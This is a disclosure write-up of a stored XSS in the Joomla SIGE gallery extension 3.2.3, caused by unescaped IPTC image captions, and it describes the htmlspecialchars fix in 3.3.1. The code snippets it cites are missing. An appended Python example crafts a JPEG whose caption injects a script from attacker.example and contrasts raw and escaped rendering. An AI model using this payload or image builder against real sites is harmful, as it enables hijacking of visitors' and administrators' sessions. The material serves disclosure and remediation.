Joomla SIGE is a popular extension for creating image galleries within the Joomla CMS. An injection vulnerability was discovered that enables a stored Cross Site Scripting (XSS) attack: the extension does not sanitize the description text that it reads from the image's metadata header before writing it into the page. Once such an image is published in a gallery, the browser of every visitor who views it loads the attacker's content.
The version I tested against is 3.2.3 from the Joomla extensions page.
In the htmlImageAddTitleAttribute function, the title of the image is incorporated into the HTML:
On line 1669 of sige.php:
The variable image_description is not escaped, so any character it contains is sent to the user unchanged. Its value comes from the getimagesize function, called in the iptcInfo function on line 1515:
The image description is copied out of the image's metadata without any escaping, so HTML special characters in it make their way to the user's browser intact.
To take advantage of this vulnerability the attacker first prepares an image whose description metadata carries the malicious content:
Next, the attacker will need to place the image into the gallery. There are multiple scenarios for how this could happen:
- A gallery may allow the public or low-privileged members to upload images.
- An attacker may already have another vulnerability which allows them to place an image into the gallery directory.
- The gallery administrator might inadvertently download a malicious image from somewhere on the internet and expose everyone who views the gallery.
Once the image description is rendered for a user, the attacker's script runs in that user's browser with that user's session on the site, which could be the Joomla administrator's.
The problem is that the injected HTML breaks the structure of the page's DOM, which makes the exploit not very stealthy. So the first thing xss.js does is clean up. Note that the clean-up code has to guard against running twice, because the SIGE plugin inserts the EXIF caption into the page twice.
To fix the vulnerability, the image description needs to be sanitised in the htmlImageAddTitleAttribute function before it reaches the HTML. PHP provides the htmlspecialchars function for exactly this (pass ENT_QUOTES if the value ever lands in a single-quoted attribute, since the default only escapes double quotes). Thanks to Viktor Vogel of Kubik-Rubik for fixing and releasing an update very quickly!
In my tests I was able to confirm that version 3.3.1 is not vulnerable to this exploit. The above code on line 1321 maps over all the data retrieved from the image and applies the htmlspecialchars function. This ensures that everything from the EXIF header is properly escaped before it is presented to the user.
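The following Python is an added illustration of both the attack preparation above and the escaping fix; it is not code from the original post or from the SIGE extension. It builds a minimal JPEG container whose IPTC Caption-Abstract (record 2, dataset 120, which PHP's iptcparse exposes as "2#120") carries an HTML payload, reads it back the way getimagesize()/iptcparse() would, and then renders the image title attribute both unescaped, as SIGE 3.2.3 did, and escaped with a htmlspecialchars equivalent. The payload text, the attacker URL and all function names are constructed assumptions; SIGE's own functions are not reproduced.

```python
"""Stored XSS via IPTC caption: craft, extract, render (added example, not SIGE code)."""
import html
import struct

IPTC_CAPTION = (2, 120)            # Caption-Abstract; iptcparse() key "2#120"
PS_HEADER = b"Photoshop 3.0\x00"   # APP13 segment prefix used by Photoshop/IPTC writers

# Constructed sample payload: closes the title attribute, drops in a script tag,
# then opens a dummy element so the rest of the page still parses.
PAYLOAD = 'Sunset"><script src="https://attacker.example/xss.js"></script><span title="'


def build_iptc_block(datasets):
    """Encode IPTC datasets: 0x1C, record, dataset, 2-byte length, data."""
    out = bytearray()
    for (rec, ds), value in datasets:
        data = value.encode("utf-8")
        out += bytes([0x1C, rec, ds]) + struct.pack(">H", len(data)) + data
    return bytes(out)


def build_app13(iptc_block):
    """Wrap an IPTC block in an 8BIM resource 0x0404 inside a JPEG APP13 segment."""
    name = b"\x00\x00"  # empty Pascal-string resource name, padded to even length
    resource = (b"8BIM" + struct.pack(">H", 0x0404) + name
                + struct.pack(">I", len(iptc_block)) + iptc_block)
    if len(iptc_block) % 2:
        resource += b"\x00"  # resource data is padded to an even byte count
    payload = PS_HEADER + resource
    return b"\xFF\xED" + struct.pack(">H", len(payload) + 2) + payload


def build_jpeg(caption):
    """Minimal JPEG (SOI, APP13, EOI): enough for metadata readers, not a decodable picture."""
    return b"\xFF\xD8" + build_app13(build_iptc_block([(IPTC_CAPTION, caption)])) + b"\xFF\xD9"


def read_app13(jpeg):
    """Walk the JPEG segments and return the APP13 body (what getimagesize puts in $info['APP13'])."""
    if jpeg[:2] != b"\xFF\xD8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 2 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker == 0xD9:          # EOI
            break
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        body = jpeg[pos + 4:pos + 2 + length]
        if marker == 0xED:          # APP13
            return body
        pos += 2 + length
    return None


def iptcparse(app13):
    """Minimal stand-in for PHP iptcparse(): returns {'2#120': [b'...'], ...}."""
    result = {}
    if not app13 or not app13.startswith(PS_HEADER):
        return result
    pos = len(PS_HEADER)
    while pos + 12 <= len(app13) and app13[pos:pos + 4] == b"8BIM":
        res_id = struct.unpack(">H", app13[pos + 4:pos + 6])[0]
        pos += 6
        name_len = app13[pos]
        pos += 1 + name_len + ((1 + name_len) % 2)   # Pascal string padded to even
        size = struct.unpack(">I", app13[pos:pos + 4])[0]
        pos += 4
        data = app13[pos:pos + size]
        pos += size + (size % 2)
        if res_id != 0x0404:
            continue
        i = 0
        while i + 5 <= len(data) and data[i] == 0x1C:
            rec, ds = data[i + 1], data[i + 2]
            dlen = struct.unpack(">H", data[i + 3:i + 5])[0]
            result.setdefault(f"{rec}#{ds}", []).append(data[i + 5:i + 5 + dlen])
            i += 5 + dlen
    return result


def title_attribute(description, escape):
    """Render title="..." either raw (the vulnerable path) or escaped.
    html.escape(quote=True) covers what htmlspecialchars(..., ENT_QUOTES) does."""
    value = html.escape(description, quote=True) if escape else description
    return f'title="{value}"'


def demo(payload=PAYLOAD):
    """Return (vulnerable_markup, fixed_markup) for an image whose caption is `payload`."""
    jpeg = build_jpeg(payload)
    description = iptcparse(read_app13(jpeg))["2#120"][0].decode("utf-8")
    return title_attribute(description, False), title_attribute(description, True)


if __name__ == "__main__":
    raw, safe = demo()
    print("3.2.3 style:", raw)
    print("3.3.1 style:", safe)
```

The unescaped rendering shows exactly why the DOM ends up mangled: the attribute closes early, the script tag is injected, and the trailing span is needed just to swallow the original closing quote. After escaping, the whole caption, quotes and angle brackets included, stays inside the attribute value and is never parsed as markup.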